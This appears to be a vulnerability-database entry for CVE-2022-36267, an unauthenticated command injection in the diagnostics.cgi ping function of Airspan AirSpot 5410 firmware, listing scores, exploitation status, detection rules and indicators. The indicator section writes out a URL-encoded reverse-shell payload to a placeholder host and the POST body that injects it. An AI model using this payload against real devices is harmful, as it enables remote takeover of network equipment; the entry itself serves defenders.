cbcvebase.
CVE-2022-36267
published 2022-08-08

CVE-2022-36267: In Airspan AirSpot 5410 version 0.3.4.1-4 and under there exists a Unauthenticated remote command injection vulnerability. The ping functionality can be called…

PriorityP191critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
53.75%
98.9th percentile
In Airspan AirSpot 5410 version 0.3.4.1-4 and under there exists a Unauthenticated remote command injection vulnerability. The ping functionality can be called without user authentication when crafting a malicious http request by injecting code in one of the parameters allowing for remote code execution. This vulnerability is exploited via the binary file /home/www/cgi-bin/diagnostics.cgi that accepts unauthenticated requests and unsanitized data. As a result, a malicious actor can craft a specific request and interact remotely with the device.

Affected

1 ranges
VendorProductVersion rangeFixed in
airspanairspot_5410_firmware<= 0.3.4.1-4

Detection & IOCsextracted from sources · hover to see the quote

path/home/www/cgi-bin/diagnostics.cgi
urlhttps://<RHOST>:<RPORT>/cgi-bin/diagnostics.cgi
command`sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{LHOST}%2F{LPORT}%200%3E%261`
otherCommand=pingDiagnostic&targetIP=1.1.1.1<PAYLOAD>&packetSize=55&timeOut=10&count=1
version0.3.4.1-4
  • Monitor for unauthenticated HTTP POST requests to /cgi-bin/diagnostics.cgi on Airspan AirSpot 5410 devices, especially those lacking a session/auth cookie.
  • Alert on POST body to diagnostics.cgi containing shell metacharacters (backticks, %60, %3E%26, /dev/tcp) in the targetIP parameter, indicating command injection attempt.
  • Detect POST requests to diagnostics.cgi where the 'targetIP' field contains values other than a valid IP address (e.g., contains backticks, semicolons, or URL-encoded shell operators).
  • Flag outbound TCP connections from the AirSpot device process space (diagnostics.cgi / sh) to arbitrary external hosts, indicative of a reverse shell being established.
  • ·The vulnerable endpoint is served over HTTPS (port 443 by default) with no authentication required; SSL inspection may be needed to inspect POST body contents for detection.
  • ·All firmware versions 0.3.4.1-4 and below are affected; ensure version checks target this range when scoping detection or patching.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.